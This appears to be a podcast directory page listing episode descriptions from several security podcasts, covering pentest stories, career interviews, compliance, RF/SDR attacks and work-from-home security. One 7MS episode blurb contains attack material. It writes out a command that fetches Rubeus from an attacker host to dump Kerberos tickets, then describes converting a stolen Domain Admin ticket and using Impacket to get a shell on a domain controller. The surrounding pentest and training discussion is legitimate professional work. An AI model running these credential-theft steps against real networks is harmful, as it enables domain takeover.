Off The Hook - Sep 23, 2020
59 min
The physical version of the 2600 Summer issue is finally available, Louisville braces for protests after charges are announced in Breonna Taylor death, sleazy politics, hackers blamed in death of German woman, backlash after publishing company conducts tone-deaf phishing test, listener emails.
7 Minute Security
7 Minute Security
Brian Johnson
7MS #442: Tales of Internal Network Pentest Pwnage - Part 23
Hey friends, I dare declare this to be my favorite tale of internal pentest pwnage so far. Why? Because the episode features: * Great blue team tools alerting our customer to a lot of the stuff we were doing * An EDR that we tried to beat up (but it beat us up instead) * SharpGPOAbuse which we talked about extensively last week * Separation of "everyday" accounts from privileged accounts * Multi-factor authentication bypass! * Some delicious findings in GPOs thanks to Ryan Hausec's great two part series (1 and 2). If you're not sure if you're vulnerable to MS14-025, check out this great article which discusses the vulnerability and its mitigation. The final cherry on top was a new attack another pentester taught me. Use a combination of SharpCradle and Rubeus to steal logged in DA creds: SharpCradle.exe -w https://your.kali.box.ip/Rubeus.exe dump /service:krbtgt /nowrap This will give you a TGT (base64 encoded) for active logon sessions to the box. So if a DA is logged in, you can snag their TGT and then convert that into a .kirbi file on your Kali box with: echo "LooooonnnnnggggggTicketStriiiiiiiiiiinnnngggg" | base64 -d > BobTheDomainAdmin.kirb Convert the .kirbi file to a .ccache file with ticket converter. Then you can use Impacket tools to use/abuse that access to your heart's delight. We ended up using Impacket to pop a shell on a DC and add a low-priv account to DA. The interesting thing is that the alert the blue team received essentially said "The DC itself added the user to the DA group" - the alert did not have attribution to the user whose ticket we stole! Good tip for future pentests!
1 hr 9 min
Getting Into Infosec
Getting Into Infosec
Ayman Elsawah (@coffeewithayman)
Lisa Jiggetts - From Navy Cook To Pentester To Non-Profit Founder!
Lisa Jiggetts knew from an early age that she was going to be in tech an cyber. A navy veteren who started off as a cook, she always found herself gravitating towards technology. She is also the Founder & Board of Director of Women’s Society of Cyberjutsu, a non-profit that is dedicated to increasing the opportunities and advancement for women in cybersecurity. Checkout her journey into the cybersecurity field.Notes * Originally a cook in the military, then migrated to information security. * Looked for opportunities to transition into information security by talking to people in and outside her social network. * Networking can be hard, but it will turn in your favor. * Lisa is an introvert, but know how to become an extrovert when needed.Quotes * "When you're starting out, you don't necessarily get into the area you want to be in—you got to work your way up." * “That's the biggest thing you can do. I think is networking because somebody knows somebody" * "So I got all these certifications… I read a book and pass. What is it to me personally? That didn't tell me, you know, how to do anything. They get you in the door" * "[Networking is] hard, but, just do it because in the end, it's gonna turn out in your favor."Links * Lisa on Twitter: https://twitter.com/lisajiggetts * Intro Music: https://trash80.com/#/content/133/weeklybeats-2012-week5 * Women’s Society of Cyberjutsu : https://womenscyberjutsu.org/Getting Into Infosec * Breaking IN: A Practical Guide to Starting a Career in Information Security: https://www.amazon.com/dp/B07N15GTPC/ * T-Shirts, Mugs, and more: https://gettingintoinfosec.com/shop/ * Stay in touch and sign up for sneak peaks, updates, and commentary: https://pages.gettingintoinfosec.com/subscribe * Ayman on Twitter: https://twitter.com/coffeewithayman
42 min
Hacker Valley Studio
Hacker Valley Studio
Hacker Valley Media
Episode 106 - Stacking the Deck of Success with AJ Yawn
In this episode of the Hacker Valley Studio podcast, hosts Ron and Chris interview AJ Yawn, CEO of ByteChek Veterans Day was special because it was the day ByteChek was announced to the world and also a shoutout to his father for serving 20 years in the US Marine Corps. AJ also was listed in LinkedIn top voices 2020 Since March AJ has been focused on helping Veterans, Cybersecurity Practitioners When AJ retired from the US Army his interest in cloud security grew. He was particularly interested in how fast organizations can grow when using cloud applications and providers As a youth, AJ was the “computer guy” in his family and in school but spent a large portion of his time playing sports (basketball). Being a middle child and sibling of 9 helped AJ overcome perseverance and learn how to play sports and compete against his older siblings - he attributes that perseverance to his ability to grind and tackle challenges with delayed gratification. . Playing basketball helped AJ learn about “trusting the process” Throughout the episode AJ talks about the highs and lows of starting a company with the only low being not getting enough sleep! He also discusses his deliberate approach to LinkedIn and its impact. AJ goes on to discuss the philosophy behind ByteChek and his experimental marketing practice. AJ also shares his 90-90-1 method with Chris and Ron. It's called the 90-90-1 method, where for 90 days straight he will focus the first 90 minutes of his day on one thing.” AJ discusses habit building, “People say it takes 21 days to build a habit, but that's actually not true. It actually takes 66 days to build a habit. And there's been some studies on this.” 1:35 - This episode begins with an intro, background info, and talk of the company launch. 6:33 - Did AJ’s interest in cybersecurity start while he was in the Army? 10:00 - Has being in the middle of a big family and playing sports shaped AJ? 12:52 - AJ and his hosts consider ByteChek’s tagline. 15:21 - How does AJ focus so well, and why did he launch the company now? 21:21 - AJ created a masterclass for himself. 25:38 - How does he make compliance exciting? 29:39- AJ is asked about the future of compliance. 33:45 - What’s one nugget of wisdom AJ can offer? Links: Connect with AJ on LinkedIn. Learn more about Hacker Valley Studio. Support Hacker Valley Studio on Patreon. Follow Hacker Valley Studio on Twitter. Follow hosts Ron Eddings and Chris Cochran on Twitter. Learn more about ByteChek, and mention Hacker Valley Studio to receive a limited time offer!
39 min
Brakeing Down Security Podcast
Brakeing Down Security Podcast
Bryan Brake, Amanda Berlin, Brian Boettcher
2020-043-Software_Defined_Radio-Sebastien_dudek-RF-attacks- IoT and car RF attacks
Sébastien Dudek - @FlUxIuS @penthertz Why we are here today? Software Defined Radio (sdr-radio.com) What kind of hardware or software do you need? Why would a security professional want to know how to use SDR tools and attacks? What other kinds of attacks can be launched? (I mean, other than replay type attacks) Door systems (badge systems) NFC? Contactless credit card attacks Smart building/home control systems Bluetooth attacks Point Of Sale systems Cellular radio 3g/4g/5g Industrial control systems Home appliances Medical telemetry systems Drones! LoRa - Wikipedia DASH7 - Wikipedia - custom TCP stack for LoRa Vehicle-to-grid - Wikipedia (V2G) Automatic Wireless Protocol Reverse Engineering | USENIX Hunting mobile devices endpoints - the RF and the Hard way | Synacktiv - Sébastien Dudek How Can Drones Be Hacked? The updated list of vulnerable drones & attack tools | by Sander Walters | Medium Carrier Aggregation explained (3gpp.org) Mobile phone jammer - Wikipedia World’s top hackers meet at the first 5G Cyber Security Hackathon - Security Boulevard Supply chain attacks - systems tend to use wireless chipsets or protocols LTE-torpedo-NDSS19.pdf (uiowa.edu) -privacy attacks on 4g/5g networks using side channel information How does someone make a faraday cage on the cheap? (mentioned in one of your class agendas) Lots of IoT devices use your typical home wifi connection, can’t you just sniff packets to get what you need? Replay attacks on car fobs: Jam and Replay Attacks on Vehicular Keyless Entry Systems (s34s0n.github.io) Attacks on Tesla wireless entry: Tesla’s keyless entry vulnerable to spoofing attack, researchers find - The Verge Garage door opener attacks: How to Hack a Garage Door in Under 10 Seconds and What You Can Do About It - ITS Tactical Kid’s toy opens garage doors: This Hacked Kids' Toy Opens Garage Doors in Seconds | WIRED What are the current limitations to testing wireless and RF related systems? What about custom wireless implementations? Cellular? Zigbee? I’m a wireless manufacturer of some kind of device. I’m freaked now by hearing you talk about how easy it is to attack wireless systems. What are some things I could do to ensure that the types of attacks we discussed here cannot affect me? Wireless defense system? https://www.researchgate.net/publication/321491751_Security_Mechanisms_to_Defend_against_New_Attacks_on_Software-Defined_Radio List of SDR software: The BIG List of RTL-SDR Supported Software (rtl-sdr.com)
32 min
Cyber Work
Cyber Work
Infosec
Privileged access management and work-from-home tips
Today we’re talking cloud security and work-from-home. If you’ve ever checked your work email on your personal phone – I know you have, because we’ve all done it! – or touched up some time-sensitive spreadsheets on the same ipad your kids use to play Animal Crossing, Terence Jackson, Chief Information Security & Privacy Officer of Thycotic, is going to tell you how to tighten up your security protocols to ensure that work-from-home doesn’t become breach-from-home! – Enter code “cyberwork” to get 30 days of free training with Infosec Skills: https://www.infosecinstitute.com/skills/ – View transcripts and additional episodes: https://www.infosecinstitute.com/podcast With more than 17 years of public and private sector IT and security experience, Terence Jackson is responsible for protecting the company’s information assets. In his role, he currently leads a corporate-wide information risk management program. He identifies, evaluates and reports on information security practices, controls and risks in order to comply with regulatory requirements and to align with the risk posture of the enterprise. Prior to joining Thycotic, Terence was the Director of Cybersecurity and Professional Services for TSI, a Virginia based Inc. 5000 company. He has also worked as a Senior Security Consultant for Clango, Inc., a top Identity and Access Management (IAM) consultancy. He was featured in and also was a contributor to the book “Tribe of Hackers.” * About Infosec* Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.
50 min
Search
Clear search
Close search
Google apps
Main menu